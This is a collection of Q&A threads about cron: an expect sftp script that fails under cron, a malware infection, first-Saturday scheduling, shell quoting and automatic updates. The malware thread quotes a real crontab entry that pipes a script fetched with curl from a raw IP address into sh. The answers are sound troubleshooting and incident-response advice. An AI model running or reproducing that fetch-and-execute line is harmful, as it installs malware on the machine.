timeout { puts "Timeout"; exit 1 }
}
spawn sftp not@this
match_max 100000
expect "password: "
send -- "notapassword\r"
expect -exact "\r
sftp> "
send -- "cd /usr/data/r1/ED\r"
expect "sftp> "
send -- "progress\r"
expect -exact "progress\r
Progress meter disabled\r
sftp> "
send -- "put REPOEX\r"
expect "sftp> "
send -- "chmod 777 REPOEX\r"
expect "sftp> "
send -- "bye\r"
expect eof
exit
|
"Works manually, fails in cron" is almost always due to one of these:
differences in environment variables: PATH and others;
different current working directory;
lack of a TTY (probably not an issue with expect scripts);
permissions (interactive testing with one user, cron job with another); or
different shell: commands in the cron command line itself are run by one shell (by default /bin/sh), while interactively you may be using another.
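A common way to check the first two points (a sketch; in real use the cron-side dump would come from a temporary crontab line such as `* * * * * env | sort > /tmp/cron-env.txt; pwd >> /tmp/cron-env.txt`) is to diff cron's environment against your login shell's:

```shell
#!/bin/sh
# Sketch: compare cron's environment with the interactive one.
# Here we fake a typically bare cron environment to show the comparison;
# in real use /tmp/cron-env.txt would be written by a temporary crontab entry.
printf 'HOME=/home/user\nPATH=/usr/bin:/bin\nSHELL=/bin/sh\n' > /tmp/cron-env.txt
env | sort > /tmp/shell-env.txt
diff /tmp/cron-env.txt /tmp/shell-env.txt > /tmp/env-diff.txt || true
echo "differences to investigate: $(wc -l < /tmp/env-diff.txt) lines"
```

Every line in the diff is a variable (often PATH) that your script may be silently depending on when run by hand.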
| Expect script fails when running from cron but works when run manually |
1,459,409,985,000 |
As a means to suppress a malware infection that created the crontab entry below, I introduced the usage of cron.deny:
*/5 * * * * curl -fsSL http://62.109.20.220:38438/start.sh|sh
However, all user crontabs suddenly stopped triggering every job.
During troubleshooting, I observed that the cron-associated files for all users are not editable.
ls -lht /etc/cron.deny
-rw-r--r-- 1 root root 5 May 23 11:51 /etc/cron.deny
ls -lht /var/spool/cron/root
-rw-r--r-- 1 root root 62 Jun 16 08:10 /var/spool/cron/root
chmod 775 /etc/cron.deny
chmod: changing permissions of `/etc/cron.deny': Operation not permitted
chmod 775 /var/spool/cron/root
chmod: changing permissions of `/var/spool/cron/root': Operation not permitted
I later found out they all have an immutable attribute.
lsattr /var/spool/cron/root
----i--------e- /var/spool/cron/root
lsattr /etc/cron.deny
----i--------e- /etc/cron.deny
I changed the immutable attribute using commands below:
chattr -i /etc/cron.deny
chattr -i /var/spool/cron/root
Yet cron still fails to trigger these jobs.
|
Stop there! Your system has been infected by a malware. At this point, you can't trust what your system says. The malware may have modified the kernel. What you see is what the malware wants you to see. The system may not behave consistently. Don't expect a file to be modified just because the editor saved it successfully, for example.
To reiterate, forget about understanding permissions, immutable attributes, etc. All that stuff is for a working system. On a compromised system, things do not behave in any consistent way.
What you need to do now is:
Take the server offline immediately. It may be infecting users with malware.
Take a backup. Don't erase any of your existing backups! You need a backup of the infected system for two reasons: to trace where the infection came from, and to ensure that you have the latest data.
Figure out how you got infected. This is important: if you bring the system back up with the same security hole as before, it'll get infected again.
Install a new system from scratch. You cannot reliably remove malware from a system. Malware tries to make this difficult, and you can never be sure that you out-tricked it.
Make sure to install the latest security updates of all software, and to configure it securely, so that it won't get infected again.
Restore your data. Make sure that you restore only data, and not vulnerable software.
See also How do I deal with a compromised server?
| Why are my crontab user files immutable and doesn't get executed even after changing attribute to mutable? |
1,459,409,985,000 |
I am trying to get a cronjob in /etc/cron.d/ to run the first Saturday of every month.
Here is what I have so far:
0 1 1-7 * 6 [`date +\%d` == 06] root && /home/test/cron-test.sh
I changed the system date to Jan 14, 2017 (a Saturday) at midnight, and checking tail /var/log/syslog | grep cron-test reports:
Jan 14 00:59:21 Inspiron-1545 cron[936]: Error: bad username; while reading /etc/cron.d/cron-check1
Jan 14 00:59:21 Inspiron-1545 cron[936]: (*system*cron-check1) ERROR (Syntax error, this crontab file will be ignored)
What am I doing wrong?
|
System-wide crontabs have the five date and time fields on each line, then the username to run the cronjob as, then the command line. In yours, the time fields seem ok, but the sixth field [`date is rather odd for a username. The error message hints at that.
Since you have root mentioned after the snippet in brackets, I think you may have just misplaced the username, so you should have:
0 1 1-7 * 6 root [`date +\%d` == 06] && /home/test/cron-test.sh
This still has the issue that [ is a command just like others, so you have to use whitespace after the [ and before the ]. And == isn't standard for comparison, = is. Also, for command substitution, $(cmd) is just nicer than backticks, so let's try:
0 1 1-7 * 6 root [ $(date +\%d) = 06 ] && /home/test/cron-test.sh
But date +%d tells the day of month, and now you're only running on the sixth day of the month (regardless of weekday). The third and fifth fields (day of month and day of week) work a bit oddly together: when both are restricted, the cronjob runs if either of them matches. But we want to run only on a Saturday, and only on the first to seventh days of the month, so we have to check one of the conditions manually.
0 1 1-7 * * root [ $(date +\%u) -eq 6 ] && /home/test/cron-test.sh
The cronjob itself runs on all of the first seven days of the month, but the manual test [ $(date +%u) -eq 6 ] checks that the day of week is Saturday, before actually running the main command.
(Some versions of the crontab(5) manual page have an example almost like that, but I can't find an online version of it.)
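You can also sanity-check the weekday guard without resetting the system clock, using GNU date's -d option (available on Ubuntu) against a known date:

```shell
#!/bin/sh
# Verify the guard against a known date: 2017-01-07 was the first Saturday
# of that month ("-d" is a GNU date extension, present on Ubuntu).
d=$(date -d 2017-01-07 +%u)
if [ "$d" -eq 6 ]; then echo "would run"; else echo "would skip"; fi
```

For that date it reports "would run", confirming that %u yields 6 on a Saturday.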
| /etc/cron.d/cronjob |
1,459,409,985,000 |
This has been a bit of a puzzle for me.
When I try the following cronjobs individually:
* * * * * /bin/bash -c "readlink /proc/$$/exe >> /root/printenv"
* * * * * /bin/bash -c "readlink /proc/$PPID/exe >> /root/printenv"
* * * * * /bin/bash -c "readlink /proc/self/exe >> /root/printenv"
* * * * * /bin/bash -c "ps -h -o comm -p $$ >> /root/printenv"
* * * * * /bin/bash -c "echo $SHELL" >> /root/printenv
I get the following results respectively:
/bin/dash
/usr/sbin/cron
/bin/readlink
sh
/bin/sh
I can't seem to have it report /bin/bash in any circumstances when called from cron like that.
In a direct cronjob * * * * * /bin/bash -c "command" how can I prove that "command" is being interpreted by /bin/bash (if it is) ?
Answer for future references:
Changing the double quote for a single quote returned the right shell:
* * * * * /bin/bash -c 'readlink /proc/$$/exe >> /root/printenv'
Returned:
/bin/bash
Thanks to all contributors to the answer below.
|
In this case my default shell is bash and I just ran a test:
sh -c 'echo $0'
result: sh
sh -c "echo $0"
result: -bash
bash -c 'echo $0'
result: bash
bash -c "echo $0"
result: -bash
It looks like you need to use single quotes around the argument to the -c switch. With double quotes, the calling shell expands $0, $$, $PPID and $SHELL before bash is ever invoked, so the child bash only sees the already-substituted values; single quotes pass the text through literally, and the new bash process performs the expansion itself. In the cron case, the calling shell is cron's /bin/sh, which is why the double-quoted tests reported dash and sh.
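The same quoting difference can be demonstrated outside cron (a quick sketch you can run in any shell):

```shell
#!/bin/sh
# Demonstration: with double quotes, the CALLING shell expands $0 before the
# child bash ever starts; single quotes let the child bash do the expansion.
inner=$(bash -c 'echo $0')    # single quotes: expanded by the new bash
outer=$(bash -c "echo $0")    # double quotes: expanded by THIS shell first
echo "single quotes -> $inner"
echo "double quotes -> $outer (whatever \$0 was in the calling shell)"
```

The single-quoted form prints "bash", which is exactly the proof the question was after.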
| How to prove that the interpreter is /bin/bash when called from cron? |
1,459,409,985,000 |
I run Ubuntu and Fedora on a day to day basis and usually run the package manager to check for updates nearly once a day.
When I get a kernel update I usually reboot, so that I'm running on the new kernel and I can see if there are any glitches (It's almost always fine).
If I add
apt-get update && apt-get -y upgrade
or
dnf check-update && dnf upgrade
to my root crontab is there anything procedurally wrong?
What if I set up crontab to do this at 4 a.m. and it installs a new kernel, then I don't reboot and it auto-installs a second new kernel. What if I don't reboot my Ubuntu box for a month and there have been 3 kernel updates and a couple of other patches to the same piece of software during this time?
Is it OK to enable automatic updating this way? I know that there's an 'unattended upgrades' utility for Ubuntu, but I'd rather learn what other system admins do and have a more 'hands on' approach to administering my PCs.
|
Generally, sysadmins with a mixed install base would use a cross-platform configuration management / orchestration system like Puppet, Chef, or Ansible to manage updates.
You could also set up one of those tools on a smaller scale if you like.
Or, on Fedora *, you can use DNF Automatic — see the Fedora page on configuring this. This is better than a simple cron script because it has better error handling and more options for output.
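For the DNF Automatic route, the setup is roughly this (a sketch from memory; verify the option names against your own /etc/dnf/automatic.conf and the Fedora documentation before relying on them):

```shell
# install and enable the timer (Fedora):
#   dnf install dnf-automatic
#   systemctl enable --now dnf-automatic.timer
#
# then, in /etc/dnf/automatic.conf, under [commands]:
#   apply_updates = yes    # actually install updates, not just download them
#   emit_via = email       # mail a report, much like cron's MAILTO would
```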
For Ubuntu, there are instructions on the community wiki for automatic updates, but I haven't used them so I can't comment more than to just provide the pointer.
* disclosure: I work on Fedora
| Is there a common way of auto-updates with cron? |